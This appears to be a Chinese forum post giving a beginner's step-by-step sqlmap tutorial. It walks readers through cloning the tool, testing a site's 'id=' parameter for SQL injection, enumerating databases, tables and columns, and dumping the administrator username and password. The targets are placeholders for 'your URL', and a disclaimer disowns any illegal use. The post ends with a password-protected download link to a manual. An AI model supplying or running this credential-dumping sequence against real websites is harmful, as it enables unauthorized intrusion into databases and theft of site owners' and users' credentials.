首先，需要一个本期的主角:sqlmap[玫瑰][滑稽][玫瑰]

先声明一下，问问题可以，请好好看看帖子和置顶内容，没有的自然会回你，有的我就不管了[阴险]
再声明一下，一切违法违规行为与本人无关，请在下载24小时内删除

下载的命令
git clone https://github.com/sqlmapproject/sqlmap.git

下面的是给小白先了解一下的，会一点的可以往下翻（用的是靶场，违规不得已才改成这样[泪]）
首先检测一个站点是否能进行sql注入
输入命令:（网址后面必须是什么什么等于一个数字例如id=1）
sqlmap -u “这里是你的网址” –batch
他就会自动扫描出现图4
就大概率代表可以注入
然后输入:
sqlmap -u “你的地址” –batch –dbs
看到像图5那样，然后输入以下命令
sqlmap -u “你的地址” –batch -D 随便选一个之前爆出来的库放在这里例如我之前的maoshe –tables
然后出现图6，这些是库里的表，然后输入命令
sqlmap -u “你的网址” –batch -D 看上次的解释 -T 这里填你要爆破的表名例如我的admin –columns
然后出现图7，这些就是具体的数据了
然后输入命令(进行爆破账号和密码)
sqlmap -u “你的网址” –batch -D 看上次的解释 -T 看上次的解释 -C username,password –dump
然后出现图8,这里就是管理员的账号和密码了（没爆破完，网不好[心碎]）

这个是手册几乎包括所有sqlmap的使用方法
https://xsfzl.lanzoum.com/iCPKG05opuuf
密码：50s9